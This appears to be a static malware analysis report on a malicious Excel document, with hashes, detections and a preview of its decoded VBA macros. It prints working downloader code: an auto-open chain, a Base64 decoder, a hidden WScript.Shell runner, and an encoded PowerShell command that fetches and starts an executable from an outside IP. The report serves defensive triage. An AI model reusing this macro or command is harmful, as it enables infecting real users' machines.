Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bbd635a64412b817…

MALICIOUS

Office (OLE)

78.5 KB Created: 2018-05-22 00:15:57 Authoring application: Microsoft Excel First seen: 2019-01-12
MD5: 0c228e6e5fb4c0ef09a00e5569ce738e SHA-1: 19f73bc3810fc982e65f64268ffa1df82c8fe47c SHA-256: bbd635a64412b817620c8105e6c91163275d7d04a9168008e21df3c49a3a7315
286 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The file is an Office document containing obfuscated VBA macros. Critical heuristics indicate that the macros create a WScript.Shell object and call its Run method, suggesting they are designed to execute arbitrary commands. The AutoOpen and Workbook_Open macros are triggered upon opening, and the extracted 'macros.bas' artifact holds the decoded macro source. The primary function of the script appears to be downloading and executing a second-stage payload.

Heuristics 10

  • ClamAV: Doc.Macro.Obfuscated-6397052-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscated-6397052-2
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Function WZcP5agXEoKYGLCIT2(xnOjQadWmHxZiFF As String)
    Dim YfXbTq6ddHpcPoUM: Set YfXbTq6ddHpcPoUM = EIwcs3JoVhcqATY("WScript.Shell")
    YfXbTq6ddHpcPoUM.Run xnOjQadWmHxZiFF, 0, True
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Public Function EIwcs3JoVhcqATY(xdS2l2yFcPofeqO As String) As Object
    Set EIwcs3JoVhcqATY = CreateObject(xdS2l2yFcPofeqO)
    End Function
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub Workbook_Open()
    AutoOpen
    End Sub
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Function
    Sub Workbook_Open()
    AutoOpen
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    End Sub
    Sub Auto_Open()
    Workbook_Open
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5898 bytes
SHA-256: bdd6b28e9f2002d44e9024cf496a8bc8f3fb6335f7ddde2546d4ae4c1e6d38bf
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
' Workbook document module (the VB_Base GUID is the Excel Workbook class).
' It carries no code in this extraction, so the Workbook_Open event handler is
' not the trigger here; see Auto_Open / Workbook_Open in module mg2SUS below.
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Worksheet document module (VB_Base GUID is the Excel Worksheet class); no code.
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Worksheet document module (VB_Base GUID is the Excel Worksheet class); no code.
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Worksheet document module (VB_Base GUID is the Excel Worksheet class); no code.
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Standard code module (only a VB_Name attribute): holds the Base64 decoder,
' the Auto_Open -> Workbook_Open -> AutoOpen start chain and the CreateObject
' wrapper. All identifiers are randomised; THREE/EIGHTTEEN are decoy names.
Attribute VB_Name = "mg2SUS"
' Custom Base64 decoder with obfuscated names.
' pYg0g5iqgabltM: Base64 text. THREE (decoy name, default True): when set, every
' character outside [A-Za-z0-9+/=] is stripped before decoding.
' Returns the decoded bytes as a VBA string (ANSI bytes widened with vbUnicode);
' returns "" for an empty input.
' NOTE(review): there is no guard for cleaned input shorter than 4 characters --
' the ReDim below then gets an upper bound below 0 and appears to raise a
' runtime error; characters beyond the last full quartet are silently ignored.
Public Function CT8VcsoyuvYfbbD(pYg0g5iqgabltM As String, Optional THREE As Boolean = True) As String
' 256-entry reverse lookup table, built once and retained across calls (Static).
' 255 marks bytes that are not part of the alphabet (this includes '=').
Static vft5EmjG78VbQtoxZJ(0 To 255) As Byte
Dim kMpNR6fXY1ZVtKjQ() As Byte, ygtgtckUb90cXN() As Byte
Dim DX1p1USxVvPeEyt As Long, vtMdZP9a3enb4BH As Long
' Entry 0 becomes 255 after initialisation, so this block runs on the first call only.
If vft5EmjG78VbQtoxZJ(0) = 0 Then
For DX1p1USxVvPeEyt = 0 To 255
vft5EmjG78VbQtoxZJ(DX1p1USxVvPeEyt) = 255
Next DX1p1USxVvPeEyt
' 'A'..'Z' (65..90) -> 0..25
For DX1p1USxVvPeEyt = 0 To 25
vft5EmjG78VbQtoxZJ(DX1p1USxVvPeEyt + 65) = DX1p1USxVvPeEyt
Next DX1p1USxVvPeEyt
' 'a'..'z' (97..122) -> 26..51
For DX1p1USxVvPeEyt = 26 To 51
vft5EmjG78VbQtoxZJ(DX1p1USxVvPeEyt + 71) = DX1p1USxVvPeEyt
Next DX1p1USxVvPeEyt
' '0'..'9' (48..57) -> 52..61
For DX1p1USxVvPeEyt = 52 To 61
vft5EmjG78VbQtoxZJ(DX1p1USxVvPeEyt - 4) = DX1p1USxVvPeEyt
Next DX1p1USxVvPeEyt
' '+' -> 62, '/' -> 63: the standard (not URL-safe) alphabet.
vft5EmjG78VbQtoxZJ(43) = 62
vft5EmjG78VbQtoxZJ(47) = 63
End If
If pYg0g5iqgabltM = "" Then Exit Function
pYg0g5iqgabltM = Trim(pYg0g5iqgabltM)
' Optional cleanup: 256 Replace() passes remove every non-alphabet character
' (whitespace, line breaks or deliberately inserted junk).
If THREE Then
For DX1p1USxVvPeEyt = 0 To 255
If Not (Chr(DX1p1USxVvPeEyt) Like "[A-Za-z0-9+/=]") Then
pYg0g5iqgabltM = Replace(pYg0g5iqgabltM, Chr(DX1p1USxVvPeEyt), "")
End If
Next DX1p1USxVvPeEyt
End If
' Input as ANSI bytes; output buffer sized at 3 bytes per 4 input characters.
ygtgtckUb90cXN() = StrConv(pYg0g5iqgabltM, vbFromUnicode)
ReDim kMpNR6fXY1ZVtKjQ(0 To ((Len(pYg0g5iqgabltM) \ 4) * 3 - 1))
' Every quartet except the last: pack four 6-bit values into a 24-bit word
' (the multiplications by &H40, &H1000 and &H40000 stand in for left shifts
' of 6, 12 and 18 bits), then split the word into three bytes.
For DX1p1USxVvPeEyt = 0 To Len(pYg0g5iqgabltM) \ 4 - 2
vtMdZP9a3enb4BH = vft5EmjG78VbQtoxZJ(ygtgtckUb90cXN(DX1p1USxVvPeEyt * 4 + 3))
vtMdZP9a3enb4BH = vtMdZP9a3enb4BH Or (vft5EmjG78VbQtoxZJ(ygtgtckUb90cXN(DX1p1USxVvPeEyt * 4 + 2)) * &H40&)
vtMdZP9a3enb4BH = vtMdZP9a3enb4BH Or (vft5EmjG78VbQtoxZJ(ygtgtckUb90cXN(DX1p1USxVvPeEyt * 4 + 1)) * &H1000&)
vtMdZP9a3enb4BH = vtMdZP9a3enb4BH Or (vft5EmjG78VbQtoxZJ(ygtgtckUb90cXN(DX1p1USxVvPeEyt * 4 + 0)) * &H40000)
kMpNR6fXY1ZVtKjQ(DX1p1USxVvPeEyt * 3 + 0) = (vtMdZP9a3enb4BH And &HFF0000) \ &H10000
kMpNR6fXY1ZVtKjQ(DX1p1USxVvPeEyt * 3 + 1) = (vtMdZP9a3enb4BH And &HFF00&) \ &H100&
kMpNR6fXY1ZVtKjQ(DX1p1USxVvPeEyt * 3 + 2) = vtMdZP9a3enb4BH And &HFF&
Next DX1p1USxVvPeEyt
' Last quartet, handled separately so that '=' padding (table value 255)
' contributes nothing. On loop exit the index already points at this quartet.
vtMdZP9a3enb4BH = 0
If vft5EmjG78VbQtoxZJ(ygtgtckUb90cXN(DX1p1USxVvPeEyt * 4 + 3)) <> 255 Then vtMdZP9a3enb4BH = vft5EmjG78VbQtoxZJ(ygtgtckUb90cXN(DX1p1USxVvPeEyt * 4 + 3))
If vft5EmjG78VbQtoxZJ(ygtgtckUb90cXN(DX1p1USxVvPeEyt * 4 + 2)) <> 255 Then vtMdZP9a3enb4BH = vtMdZP9a3enb4BH Or (vft5EmjG78VbQtoxZJ(ygtgtckUb90cXN(DX1p1USxVvPeEyt * 4 + 2)) * &H40&)
If vft5EmjG78VbQtoxZJ(ygtgtckUb90cXN(DX1p1USxVvPeEyt * 4 + 1)) <> 255 Then vtMdZP9a3enb4BH = vtMdZP9a3enb4BH Or (vft5EmjG78VbQtoxZJ(ygtgtckUb90cXN(DX1p1USxVvPeEyt * 4 + 1)) * &H1000&)
If vft5EmjG78VbQtoxZJ(ygtgtckUb90cXN(DX1p1USxVvPeEyt * 4 + 0)) <> 255 Then vtMdZP9a3enb4BH = vtMdZP9a3enb4BH Or (vft5EmjG78VbQtoxZJ(ygtgtckUb90cXN(DX1p1USxVvPeEyt * 4 + 0)) * &H40000)
kMpNR6fXY1ZVtKjQ(DX1p1USxVvPeEyt * 3 + 0) = (vtMdZP9a3enb4BH And &HFF0000) \ &H10000
kMpNR6fXY1ZVtKjQ(DX1p1USxVvPeEyt * 3 + 1) = (vtMdZP9a3enb4BH And &HFF00&) \ &H100&
kMpNR6fXY1ZVtKjQ(DX1p1USxVvPeEyt * 3 + 2) = vtMdZP9a3enb4BH And &HFF&
' Padding check on the raw input bytes: 61 is ASCII '='. Two '=' drop the last
' two output bytes, one '=' drops one, otherwise the whole buffer is returned.
If ygtgtckUb90cXN(UBound(ygtgtckUb90cXN) - 1) = 61 Then
CT8VcsoyuvYfbbD = Left(StrConv(kMpNR6fXY1ZVtKjQ, vbUnicode), UBound(kMpNR6fXY1ZVtKjQ) - 1)
ElseIf ygtgtckUb90cXN(UBound(ygtgtckUb90cXN)) = 61 Then
CT8VcsoyuvYfbbD = Left(StrConv(kMpNR6fXY1ZVtKjQ, vbUnicode), UBound(kMpNR6fXY1ZVtKjQ) - 0)
Else
CT8VcsoyuvYfbbD = StrConv(kMpNR6fXY1ZVtKjQ, vbUnicode)
End If
End Function
' Plain Sub named like the workbook event but placed in standard module mg2SUS,
' not in ThisWorkbook, so Excel presumably does not fire it as an event; it is
' reached from Auto_Open and simply forwards to AutoOpen (OLE_VBA_WBOPEN).
Sub Workbook_Open()
AutoOpen
End Sub
' Auto_Open in a standard module is executed by Excel when the workbook opens;
' this is the effective trigger of the chain Auto_Open -> Workbook_Open -> AutoOpen
' (OLE_VBA_AUTO / T1204.002).
Sub Auto_Open()
Workbook_Open
End Sub

' Thin wrapper around CreateObject. The indirection keeps the "WScript.Shell"
' literal away from a direct CreateObject call; the OLE_VBA_CREATEOBJ heuristic
' still matches the wrapper itself.
' xdS2l2yFcPofeqO: ProgID to instantiate. Returns the created object.
Public Function EIwcs3JoVhcqATY(xdS2l2yFcPofeqO As String) As Object
Set EIwcs3JoVhcqATY = CreateObject(xdS2l2yFcPofeqO)
End Function
' Final stage of the start chain: rebuilds a Base64 command line, decodes it
' with CT8VcsoyuvYfbbD and hands it to the hidden WScript.Shell runner in the
' form module FLtO9I (T1059.005).
Sub AutoOpen()
Dim NNTvluuKPGQjEc As String
' The "long base64-like blob" flagged under EXTRACTED_FILE_STATIC_TRIAGE. It is
' deliberately incomplete: its leading characters come from FLtO9I.PXiEKxG,
' whose value is not part of this extracted text. The fragment is consistent
' with the tail of the Base64 encoding of "powershell.exe " followed by
' -ExecutionPolicy Bypass -WindowStyle hidden -nologo -noprofile and a -c
' payload that uses Net.WebClient.DownloadFile to fetch
' hxxp://41.59.0.100/intranet/js/throw.exe into C:\Users\Public\excel.exe and
' then Start-Process on it (URL defanged; confirm against the full decoded
' string once PXiEKxG is recovered). Network IoC and drop path worth adding to
' the report's indicators.
NNTvluuKPGQjEc = "JzaGVsbC5leGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLVdpbmRvd1N0eWxlIGhpZGRlbiAtbm9sb2dvIC1ub3Byb2ZpbGUgLWMgSUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8vNDEuNTkuMC4xMDAvaW50cmFuZXQvanMvdGhyb3cuZXhlJywgJ0M6XFVzZXJzXFB1YmxpY1xleGNlbC5leGUnKTsgU3RhcnQtUHJvY2VzcyBDOlxVc2Vyc1xQdWJsaWNcZXhjZWwuZXhl"
Dim qX9jovfv26b4yQrIazTZI As String
' Prefix read from the form module; presumably a control or property on the
' form, which is why it does not appear in the extracted VBA source.
qX9jovfv26b4yQrIazTZI = FLtO9I.PXiEKxG
Dim EIGHTTEEN As String
' Decoy name. prefix & fragment -> decoded command line.
EIGHTTEEN = CT8VcsoyuvYfbbD(qX9jovfv26b4yQrIazTZI & NNTvluuKPGQjEc)
' Runs the command with a hidden window and waits for it to finish.
FLtO9I.WZcP5agXEoKYGLCIT2 (EIGHTTEEN)
End Sub

' Designer-backed module (two VB_Base GUIDs, VB_Exposed = False), presumably a
' UserForm. AutoOpen reads FLtO9I.PXiEKxG from it; that value is not in the
' extracted VBA text and would have to be recovered from the form's designer
' storage in the OLE container -- TODO confirm.
Attribute VB_Name = "FLtO9I"
Attribute VB_Base = "0{DA6C8FFA-D929-40C8-902A-F3B0B140064E}{14C77E71-7F94-413F-B533-ED4D6B52A83A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
              
' Command runner in the form module (OLE_VBA_WSCRIPT / SC_STR_WSCRIPT match).
' Obtains a WScript.Shell through the CreateObject wrapper in mg2SUS and calls
' Run with window style 0 (hidden) and bWaitOnReturn = True, i.e. the macro
' blocks until the spawned command exits. Declared as a Function but never
' assigns a return value.
' xnOjQadWmHxZiFF: the command line to execute.
Function WZcP5agXEoKYGLCIT2(xnOjQadWmHxZiFF As String)
Dim YfXbTq6ddHpcPoUM: Set YfXbTq6ddHpcPoUM = EIwcs3JoVhcqATY("WScript.Shell")
YfXbTq6ddHpcPoUM.Run xnOjQadWmHxZiFF, 0, True
End Function